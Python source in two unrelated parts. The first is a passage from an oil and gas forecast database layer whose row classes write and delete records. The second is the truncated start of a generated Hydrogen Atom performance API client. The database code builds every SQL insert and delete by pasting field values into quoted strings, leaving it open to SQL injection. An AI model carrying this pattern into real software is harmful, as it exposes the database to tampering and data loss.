elif len(rows) == 0:
#If no row exists, go ahead and write one
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
else:
Success, Message = self.Delete()
if Success:
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
if not Success:
rows[0].Write(Update_User, Update_Date)
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error updating the Frac Hit Multipliers table. ' + str(ex))
return Success, Messages
def Delete(self):
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(self.Date_Key, datetime):
self.Date_Key = self.Date_Key.strftime('%Y-%m-%d %H:%M:%S')
delete_stmt = 'delete from [LEForecastDatabase].[dbo].[Frac_Hit_Multipliers] where LEName = \'' + self.LEName + '\' and CorpID = \'' + self.CorpID + '\' and Date_Key = \'' + self.Date_Key + '\''
Success, Message = self.DBObj.Command(delete_stmt)
if not Success:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error during delete operation. ' + str(ex))
return Success, Messages
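# --- Usage sketch (illustrative) ---
# Frac-hit multipliers are stored as strings; Write() coerces a numeric
# Multiplier via str(). The names and values below are placeholders.
#
#   from datetime import datetime
#   row = FracHitMultipliersRow('Aug LE', 'C0001',
#                               '2020-08-01 00:00:00', 0.85, db)
#   success, messages = row.Update('jsmith', datetime.now())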
class AreaAggregation:
def __init__(self, DBObj, AggregateName = [], WellNames = [], CorpIDs = []):
from Model import ModelLayer as m
from Model import BPXDatabase as bpx
self.AggregateName = AggregateName
self.WellNames = WellNames
self.CorpIDs = CorpIDs
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
self.table = 'AreaAggregation'
def ReadTable(self):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
Success = True
Messages = []
header_df = pd.DataFrame()
try:
#Create dictionary to pass to where clause
where_dict = {}
if self.AggregateName:
where_dict['AggregateName'] = self.AggregateName
if self.WellNames:
where_dict['WellName'] = self.WellNames
if self.CorpIDs:
where_dict['CorpID'] = self.CorpIDs
#Interpret key words as clauses used to filter query
where_clause = m.ValidateAndClauseArguments(where_dict, self.table, self.DBObj)
data_df = m.ReadFromTables(self.DBObj, self.table, where_clause)
rows = []
for idx, item in data_df.iterrows():
row = m.AreaAggregationRow(item['AggregateName'] , item['WellName'], item['CorpID'], self.DBObj)
rows.append(row)
except Exception as ex:
rows = []
Success = False
Messages.append('Error reading from the database. ' + str(ex))
return rows, Success, Messages
class AreaAggregationRow:
def __init__(self, AggregateName, WellName, CorpID, DBObj):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
self.AggregateName = AggregateName
self.WellName = WellName
self.CorpID = CorpID
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def Write(self, Update_User, Update_Date):
from Model import BPXDatabase as bpx
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(Update_Date, datetime):
Update_Date = Update_Date.strftime('%Y-%m-%d %H:%M:%S')
insert_statement = 'insert into [LEForecastDatabase].[dbo].[AreaAggregation] (AggregateName, WellName, CorpID, Update_Date, Update_User ) values \n'\
'(\'' + self.AggregateName + '\', \'' + self.WellName + '\', \'' + self.CorpID + '\', \'' + Update_Date + '\', \'' + Update_User + '\')'
Success, Message = self.DBObj.Command(insert_statement)
if Success:
self.DBObj.Command('commit')
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error writing to the database. ' + str(ex))
return Success, Messages
def Update(self, Update_User, Update_Date):
from Model import ModelLayer as m
Success = True
Messages = []
try:
#Primary keys for Aggregation Area table, Query the table for existing entry
AreaAggregationObj = m.AreaAggregation(self.DBObj, [self.AggregateName], [self.WellName], [self.CorpID])
rows, Success, Message = AreaAggregationObj.ReadTable()
if not Success:
Messages.append(Message)
if len(rows) > 1 or not Success:
Success = False
Messages.append('Unsuccessful in attempt to find single entry of data table.')
elif len(rows) == 0:
#If no row exists, go ahead and write one
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
else:
Success, Message = self.Delete()
if Success:
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
if not Success:
rows[0].Write(Update_User, Update_Date)
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error updating the Area Aggregation table. ' + str(ex))
return Success, Messages
def Delete(self):
from datetime import datetime
Success = True
Messages = []
try:
delete_stmt = 'delete from [LEForecastDatabase].[dbo].[AreaAggregation] where AggregateName = \'' + self.AggregateName + '\' and CorpID = \'' + self.CorpID + '\''
Success, Message = self.DBObj.Command(delete_stmt)
if not Success:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error during delete operation. ' + str(ex))
return Success, Messages
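# --- Usage sketch (illustrative) ---
# Listing the wells grouped under a named aggregate; the aggregate name and
# `db` connection are placeholders.
#
#   agg = AreaAggregation(db, AggregateName=['East Area'])
#   rows, success, messages = agg.ReadTable()
#   wells = [(r.WellName, r.CorpID) for r in rows]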
class ProductionAdjustments:
def __init__(self, DBObj, LEName=[], CorpID=[], Date_Key = []):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
import pandas as pd
self.table = 'ProductionAdjustments'
self.LEName = LEName
self.CorpID = CorpID
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
self.Date_Key = Date_Key
def ReadTable(self):
from Model import BPXDatabase as bpx
import pandas as pd
from Model import ModelLayer as m
from datetime import datetime
Success = True
Messages = []
header_df = pd.DataFrame()
try:
#Create dictionary to pass to where clause
where_dict = {}
if self.LEName:
where_dict['LEName'] = self.LEName
if self.CorpID:
where_dict['CorpID'] = self.CorpID
if self.Date_Key:
if isinstance(self.Date_Key[0], datetime):
self.Date_Key[0] = self.Date_Key[0].strftime('%Y-%m-%d %H:%M:%S')
where_dict['Date_Key'] = self.Date_Key
#Interpret key words as clauses used to filter query
where_clause = m.ValidateAndClauseArguments(where_dict, self.table, self.DBObj)
data_df = m.ReadFromTables(self.DBObj, self.table, where_clause)
rows = []
for idx, item in data_df.iterrows():
row = m.ProductionAdjustmentsRow(item['LEName'] , item['WellName'], item['CorpID'], item['Date_Key'], item['AdjustedGasProduction'], item['AdjustedOilProduction'], item['AdjustedWaterProduction'], self.DBObj)
rows.append(row)
except Exception as ex:
rows = []
Success = False
Messages.append('Error reading from the database. ' + str(ex))
return rows, Success, Messages
class ProductionAdjustmentsRow:
def __init__(self, LEName, WellName, CorpID, Date_Key, AdjustedGasProduction, AdjustedOilProduction, AdjustedWaterProduction, DBObj):
from Model import BPXDatabase as bpx
from Model import ModelLayer as m
self.LEName = LEName
self.WellName = WellName
self.CorpID = CorpID
self.Date_Key = Date_Key
self.AdjustedGasProduction = AdjustedGasProduction
self.AdjustedOilProduction = AdjustedOilProduction
self.AdjustedWaterProduction = AdjustedWaterProduction
if not DBObj:
config = m.GetConfig()
self.DBObj = bpx.BPXDatabase(config['server'], config['database'], config['UID'])
else:
self.DBObj = DBObj
def Write(self, Update_User, Update_Date):
from Model import BPXDatabase as bpx
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(Update_Date, datetime):
Update_Date = Update_Date.strftime('%Y-%m-%d %H:%M:%S')
if isinstance(self.Date_Key, datetime):
self.Date_Key = self.Date_Key.strftime('%Y-%m-%d %H:%M:%S')
if not self.AdjustedGasProduction:
self.AdjustedGasProduction = 0
if not self.AdjustedOilProduction:
self.AdjustedOilProduction = 0
if not self.AdjustedWaterProduction:
self.AdjustedWaterProduction = 0
insert_statement = 'insert into [LEForecastDatabase].[dbo].[ProductionAdjustments] (LEName, WellName, CorpID, Date_Key, AdjustedGasProduction, AdjustedOilProduction, AdjustedWaterProduction, Update_Date, Update_User)'\
' values (\'' + self.LEName + '\', \'' + self.WellName + '\', \'' + self.CorpID + '\', convert(datetime, \'' + self.Date_Key + '\', 120) , ' + str(self.AdjustedGasProduction) + ',\n'\
'' + str(self.AdjustedOilProduction) + ', ' + str(self.AdjustedWaterProduction) + ', convert(datetime, \'' + Update_Date + '\', 120), \'' + Update_User + '\')'
Success, Message = self.DBObj.Command(insert_statement)
if Success:
self.DBObj.Command('commit')
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error writing to the database. ' + str(ex))
return Success, Messages
def Update(self, Update_User, Update_Date):
from Model import ModelLayer as m
Success = True
Messages = []
try:
#Primary keys for LE Data table, Query the table for existing entry
ProdAdjustmentsObj = m.ProductionAdjustments(self.DBObj, [self.LEName], [self.CorpID], [self.Date_Key])
rows, Success, Message = ProdAdjustmentsObj.ReadTable()
if not Success:
Messages.append(Message)
if len(rows) > 1 or not Success:
Success = False
Messages.append('Unsuccessful in attempt to find single entry of data table.')
elif len(rows) == 0:
#If no row exists, go ahead and write one
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
else:
Success, Message = self.Delete()
if Success:
Success, Message = self.Write(Update_User, Update_Date)
Messages.append(Message)
if not Success:
rows[0].Write(Update_User, Update_Date)
else:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error updating the Production Adjustments table. ' + str(ex))
return Success, Messages
def Delete(self):
from datetime import datetime
Success = True
Messages = []
try:
if isinstance(self.Date_Key, datetime):
self.Date_Key = self.Date_Key.strftime('%Y-%m-%d %H:%M:%S')
delete_stmt = 'delete from [LEForecastDatabase].[dbo].[ProductionAdjustments] where LEName = \'' + self.LEName + '\' and CorpID = \'' + self.CorpID + '\' and Date_Key = \'' + self.Date_Key + '\''
Success, Message = self.DBObj.Command(delete_stmt)
if not Success:
Messages.append(Message)
except Exception as ex:
Success = False
Messages.append('Error during delete operation. ' + str(ex))
return Success, Messages
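# --- Usage sketch (illustrative) ---
# Writing a production adjustment; Write() serializes datetimes with
# '%Y-%m-%d %H:%M:%S' and defaults missing volumes to 0. Values and the
# `db` connection are placeholders.
#
#   from datetime import datetime
#   row = ProductionAdjustmentsRow('Aug LE', 'Well_1', 'C0001',
#                                  datetime(2020, 8, 1), 5200.0, 480.0,
#                                  None, db)
#   success, messages = row.Write('jsmith', datetime.now())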
49a6050dfbe4ba042e42fdfbe7990e4308316eee | 104,391 | py | Python | atom/nucleus/python/nucleus_api/api/performance_api.py | sumit4-ttn/SDK | b3ae385e5415e47ac70abd0b3fdeeaeee9aa7cff | ["Apache-2.0"]
# coding: utf-8
"""
Hydrogen Atom API
The Hydrogen Atom API # noqa: E501
OpenAPI spec version: 1.7.0
Contact: info@hydrogenplatform.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from nucleus_api.api_client import ApiClient
class PerformanceApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_account_performance_using_get(self, account_id, **kwargs): # noqa: E501
"""Account Performance # noqa: E501
Get information on the performance of an account using IRR (Internal Rate of Return). You must provide the unique account_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_performance_using_get(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: Account Id -/account (required)
:param str active_premium_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str annualized_return_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str benchmark_id: Client Benchmark or Tenant Benchmark id -/benchmark
:param date end_date: end date
:param float hist_factor: Histogram factor- (statId: 39, default: 5)
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.e. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo, i.e. 50 - (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo, i.e. 20 - (statId: 62, default: 5)
:param int moving_average_n_day: number of days for moving average n-day - (statId: 18, default: 7)
:param int n_day_returns: number of days for Rolling n-day returns - (statId: 2, default: 7)
:param int n_path_monte_carlo: number of points for a simulation- (statId: 62, default: 100)
:param int n_rolling_max_drawdown: number of days for Rolling n-day max drawdown- (statId: 46, default: 7)
:param int n_rolling_volatility: number of days for Rolling n-day volatility- (statId: 34, default: 7)
:param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
:param str period_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () -Carries out stats on either daily, monthly, annually or quarterly dates (default: 'D')
:param float risk_free_alpha: risk free val alpha - (statId: 52, default: 0)
:param float risk_free_sharpe: risk free val sharpe- (statId: 49, default: 0)
:param float risk_free_sortino: risk free val sortino - (statId: 56, default: 0)
:param float risk_free_treynor: risk free val treynor- (statId: 51, default: 0)
:param date start_date: start date
:param str stat: A stat type - /statistics
:param float var_conf_interval: VaR Confidence Interval (alpha), i.e. 99, 95, etc. - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_account_performance_using_get_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_performance_using_get_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_account_performance_using_get_with_http_info(self, account_id, **kwargs): # noqa: E501
"""Account Performance # noqa: E501
Get information on the performance of an account using IRR (Internal Rate of Return). You must provide the unique account_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_account_performance_using_get_with_http_info(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: Account Id -/account (required)
:param str active_premium_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str annualized_return_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str benchmark_id: Client Benchmark or Tenant Benchmark id -/benchmark
:param date end_date: end date
:param float hist_factor: Histogram factor- (statId: 39, default: 5)
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.e. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo, i.e. 50 - (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo, i.e. 20 - (statId: 62, default: 5)
:param int moving_average_n_day: number of days for moving average n-day - (statId: 18, default: 7)
:param int n_day_returns: number of days for Rolling n-day returns - (statId: 2, default: 7)
:param int n_path_monte_carlo: number of points for a simulation- (statId: 62, default: 100)
:param int n_rolling_max_drawdown: number of days for Rolling n-day max drawdown- (statId: 46, default: 7)
:param int n_rolling_volatility: number of days for Rolling n-day volatility- (statId: 34, default: 7)
:param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
:param str period_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () -Carries out stats on either daily, monthly, annually or quarterly dates (default: 'D')
:param float risk_free_alpha: risk free val alpha - (statId: 52, default: 0)
:param float risk_free_sharpe: risk free val sharpe- (statId: 49, default: 0)
:param float risk_free_sortino: risk free val sortino - (statId: 56, default: 0)
:param float risk_free_treynor: risk free val treynor- (statId: 51, default: 0)
:param date start_date: start date
:param str stat: A stat type - /statistics
:param float var_conf_interval: VaR Confidence Interval (alpha), i.e. 99, 95, etc. - (statId: 40, default: 95)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'active_premium_period', 'annualized_return_period', 'benchmark_id', 'end_date', 'hist_factor', 'mar_down_side_deviation', 'max_percentile_monte_carlo', 'mean_percentile_monte_carlo', 'min_percentile_monte_carlo', 'moving_average_n_day', 'n_day_returns', 'n_path_monte_carlo', 'n_rolling_max_drawdown', 'n_rolling_volatility', 'num_sim_monte_carlo', 'period_type', 'risk_free_alpha', 'risk_free_sharpe', 'risk_free_sortino', 'risk_free_treynor', 'start_date', 'stat', 'var_conf_interval'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_performance_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_account_performance_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
query_params = []
if 'active_premium_period' in params:
query_params.append(('active_premium_period', params['active_premium_period'])) # noqa: E501
if 'annualized_return_period' in params:
query_params.append(('annualized_return_period', params['annualized_return_period'])) # noqa: E501
if 'benchmark_id' in params:
query_params.append(('benchmark_id', params['benchmark_id'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'hist_factor' in params:
query_params.append(('hist_factor', params['hist_factor'])) # noqa: E501
if 'mar_down_side_deviation' in params:
query_params.append(('mar_down_side_deviation', params['mar_down_side_deviation'])) # noqa: E501
if 'max_percentile_monte_carlo' in params:
query_params.append(('max_percentile_monte_carlo', params['max_percentile_monte_carlo'])) # noqa: E501
if 'mean_percentile_monte_carlo' in params:
query_params.append(('mean_percentile_monte_carlo', params['mean_percentile_monte_carlo'])) # noqa: E501
if 'min_percentile_monte_carlo' in params:
query_params.append(('min_percentile_monte_carlo', params['min_percentile_monte_carlo'])) # noqa: E501
if 'moving_average_n_day' in params:
query_params.append(('moving_average_n_day', params['moving_average_n_day'])) # noqa: E501
if 'n_day_returns' in params:
query_params.append(('n_day_returns', params['n_day_returns'])) # noqa: E501
if 'n_path_monte_carlo' in params:
query_params.append(('n_path_monte_carlo', params['n_path_monte_carlo'])) # noqa: E501
if 'n_rolling_max_drawdown' in params:
query_params.append(('n_rolling_max_drawdown', params['n_rolling_max_drawdown'])) # noqa: E501
if 'n_rolling_volatility' in params:
query_params.append(('n_rolling_volatility', params['n_rolling_volatility'])) # noqa: E501
if 'num_sim_monte_carlo' in params:
query_params.append(('num_sim_monte_carlo', params['num_sim_monte_carlo'])) # noqa: E501
if 'period_type' in params:
query_params.append(('period_type', params['period_type'])) # noqa: E501
if 'risk_free_alpha' in params:
query_params.append(('risk_free_alpha', params['risk_free_alpha'])) # noqa: E501
if 'risk_free_sharpe' in params:
query_params.append(('risk_free_sharpe', params['risk_free_sharpe'])) # noqa: E501
if 'risk_free_sortino' in params:
query_params.append(('risk_free_sortino', params['risk_free_sortino'])) # noqa: E501
if 'risk_free_treynor' in params:
query_params.append(('risk_free_treynor', params['risk_free_treynor'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
if 'stat' in params:
query_params.append(('stat', params['stat'])) # noqa: E501
if 'var_conf_interval' in params:
query_params.append(('var_conf_interval', params['var_conf_interval'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/account/{account_id}/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
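# --- Usage sketch (illustrative, not generated code) ---
# Synchronous and asynchronous calls to the account performance endpoint;
# the account id and keyword values below are placeholders.
#
#   from nucleus_api.api.performance_api import PerformanceApi
#   api = PerformanceApi()
#   perf = api.get_account_performance_using_get('ACCOUNT_ID', period_type='M')
#   thread = api.get_account_performance_using_get('ACCOUNT_ID', async_req=True)
#   perf = thread.get()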
def get_allocation_performance_using_get(self, allocation_id, **kwargs): # noqa: E501
"""Allocation Performance # noqa: E501
Get information on the performance of an allocation using TWR (Time Weighted Return). You must provide the unique allocation_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_allocation_performance_using_get(allocation_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str allocation_id: Allocation Id -/allocation (required)
:param str active_premium_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str annualized_return_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str benchmark_id: Tenant Benchmark Id -/benchmark
:param date end_date: end date
:param float hist_factor: Histogram factor- (statId: 39, default: 5)
:param bool is_current_weight: is_current_weight
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.e. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo, i.e. 50 - (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo, i.e. 20 - (statId: 62, default: 5)
:param int moving_average_n_day: number of days for moving average n-day - (statId: 18, default: 7)
:param int n_day_returns: number of days for Rolling n-day returns - (statId: 2, default: 7)
:param int n_path_monte_carlo: number of points for a simulation- (statId: 62, default: 100)
:param int n_rolling_max_drawdown: number of days for Rolling n-day max drawdown- (statId: 46, default: 7)
:param int n_rolling_volatility: number of days for Rolling n-day volatility- (statId: 34, default: 7)
:param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
:param str period_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () -Carries out stats on either daily, monthly, annually or quarterly dates (default: 'D')
:param float risk_free_alpha: risk free val alpha - (statId: 52, default: 0)
:param float risk_free_sharpe: risk free val sharpe- (statId: 49, default: 0)
:param float risk_free_sortino: risk free val sortino - (statId: 56, default: 0)
:param float risk_free_treynor: risk free val treynor- (statId: 51, default: 0)
:param date start_date: start date
:param str stat: A stat type found under the Statistics banner
:param float var_conf_interval: VaR Confidence Interval (alpha), i.e. 99, 95, etc. - (statId: 40, default: 95)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_allocation_performance_using_get_with_http_info(allocation_id, **kwargs) # noqa: E501
else:
(data) = self.get_allocation_performance_using_get_with_http_info(allocation_id, **kwargs) # noqa: E501
return data
def get_allocation_performance_using_get_with_http_info(self, allocation_id, **kwargs): # noqa: E501
"""Allocation Performance # noqa: E501
Get information on the performance of an allocation using TWR (Time Weighted Return). You must provide the unique allocation_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_allocation_performance_using_get_with_http_info(allocation_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str allocation_id: Allocation Id -/allocation (required)
:param str active_premium_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str annualized_return_period: Q (quarterly), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () - (statId: 19, default: 'D')
:param str benchmark_id: Tenant Benchmark Id -/benchmark
:param date end_date: end date
:param float hist_factor: Histogram factor- (statId: 39, default: 5)
:param bool is_current_weight: is_current_weight
:param float mar_down_side_deviation: minimum acceptable return for downside deviation - (statId: 58, default: 0)
:param float max_percentile_monte_carlo: max percentile for monte carlo, i.e. 80 - (statId: 62, default: 95)
:param float mean_percentile_monte_carlo: mean percentile for monte carlo, i.e. 50 - (statId: 62, default: 50)
:param float min_percentile_monte_carlo: min percentile for monte carlo, i.e. 20 - (statId: 62, default: 5)
:param int moving_average_n_day: number of days for moving average n-day - (statId: 18, default: 7)
:param int n_day_returns: number of days for Rolling n-day returns - (statId: 2, default: 7)
:param int n_path_monte_carlo: number of points for a simulation- (statId: 62, default: 100)
:param int n_rolling_max_drawdown: number of days for Rolling n-day max drawdown- (statId: 46, default: 7)
:param int n_rolling_volatility: number of days for Rolling n-day volatility- (statId: 34, default: 7)
:param int num_sim_monte_carlo: number of simulations - (statId: 62, default: 1000)
:param str period_type: Quarter (Q), Monthly (M) , Annually (Y), Daily (D) --caps matter, codes in () -Carries out stats on either daily, monthly, annually or quarterly dates (default: 'D')
:param float risk_free_alpha: risk free val alpha - (statId: 52, default: 0)
:param float risk_free_sharpe: risk free val sharpe- (statId: 49, default: 0)
:param float risk_free_sortino: risk free val sortino - (statId: 56, default: 0)
:param float risk_free_treynor: risk free val treynor- (statId: 51, default: 0)
:param date start_date: start date
:param str stat: A stat type found under the Statistics banner
:param float var_conf_interval: VaR Confidence Interval (alpha), i.e. 99, 95, etc. - (statId: 40, default: 95)
:return: dict(str, object)
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['allocation_id', 'active_premium_period', 'annualized_return_period', 'benchmark_id', 'end_date', 'hist_factor', 'is_current_weight', 'mar_down_side_deviation', 'max_percentile_monte_carlo', 'mean_percentile_monte_carlo', 'min_percentile_monte_carlo', 'moving_average_n_day', 'n_day_returns', 'n_path_monte_carlo', 'n_rolling_max_drawdown', 'n_rolling_volatility', 'num_sim_monte_carlo', 'period_type', 'risk_free_alpha', 'risk_free_sharpe', 'risk_free_sortino', 'risk_free_treynor', 'start_date', 'stat', 'var_conf_interval'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_allocation_performance_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'allocation_id' is set
if ('allocation_id' not in params or
params['allocation_id'] is None):
raise ValueError("Missing the required parameter `allocation_id` when calling `get_allocation_performance_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'allocation_id' in params:
path_params['allocation_id'] = params['allocation_id'] # noqa: E501
query_params = []
if 'active_premium_period' in params:
query_params.append(('active_premium_period', params['active_premium_period'])) # noqa: E501
if 'annualized_return_period' in params:
query_params.append(('annualized_return_period', params['annualized_return_period'])) # noqa: E501
if 'benchmark_id' in params:
query_params.append(('benchmark_id', params['benchmark_id'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'hist_factor' in params:
query_params.append(('hist_factor', params['hist_factor'])) # noqa: E501
if 'is_current_weight' in params:
query_params.append(('is_current_weight', params['is_current_weight'])) # noqa: E501
if 'mar_down_side_deviation' in params:
query_params.append(('mar_down_side_deviation', params['mar_down_side_deviation'])) # noqa: E501
if 'max_percentile_monte_carlo' in params:
query_params.append(('max_percentile_monte_carlo', params['max_percentile_monte_carlo'])) # noqa: E501
if 'mean_percentile_monte_carlo' in params:
query_params.append(('mean_percentile_monte_carlo', params['mean_percentile_monte_carlo'])) # noqa: E501
if 'min_percentile_monte_carlo' in params:
query_params.append(('min_percentile_monte_carlo', params['min_percentile_monte_carlo'])) # noqa: E501
if 'moving_average_n_day' in params:
query_params.append(('moving_average_n_day', params['moving_average_n_day'])) # noqa: E501
if 'n_day_returns' in params:
query_params.append(('n_day_returns', params['n_day_returns'])) # noqa: E501
if 'n_path_monte_carlo' in params:
query_params.append(('n_path_monte_carlo', params['n_path_monte_carlo'])) # noqa: E501
if 'n_rolling_max_drawdown' in params:
query_params.append(('n_rolling_max_drawdown', params['n_rolling_max_drawdown'])) # noqa: E501
if 'n_rolling_volatility' in params:
query_params.append(('n_rolling_volatility', params['n_rolling_volatility'])) # noqa: E501
if 'num_sim_monte_carlo' in params:
query_params.append(('num_sim_monte_carlo', params['num_sim_monte_carlo'])) # noqa: E501
if 'period_type' in params:
query_params.append(('period_type', params['period_type'])) # noqa: E501
if 'risk_free_alpha' in params:
query_params.append(('risk_free_alpha', params['risk_free_alpha'])) # noqa: E501
if 'risk_free_sharpe' in params:
query_params.append(('risk_free_sharpe', params['risk_free_sharpe'])) # noqa: E501
if 'risk_free_sortino' in params:
query_params.append(('risk_free_sortino', params['risk_free_sortino'])) # noqa: E501
if 'risk_free_treynor' in params:
query_params.append(('risk_free_treynor', params['risk_free_treynor'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
if 'stat' in params:
query_params.append(('stat', params['stat'])) # noqa: E501
if 'var_conf_interval' in params:
query_params.append(('var_conf_interval', params['var_conf_interval'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/allocation/{allocation_id}/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, object)', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_benchmark_performance_using_get(self, benchmark_id, **kwargs): # noqa: E501
"""Benchmark Performance # noqa: E501
Get information on the performance of a benchmark using TWR (Time Weighted Return). You must provide the unique benchmark_id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_benchmark_performance_using_get(benchmark_id, async_req=True)
>>> result = thread.get()
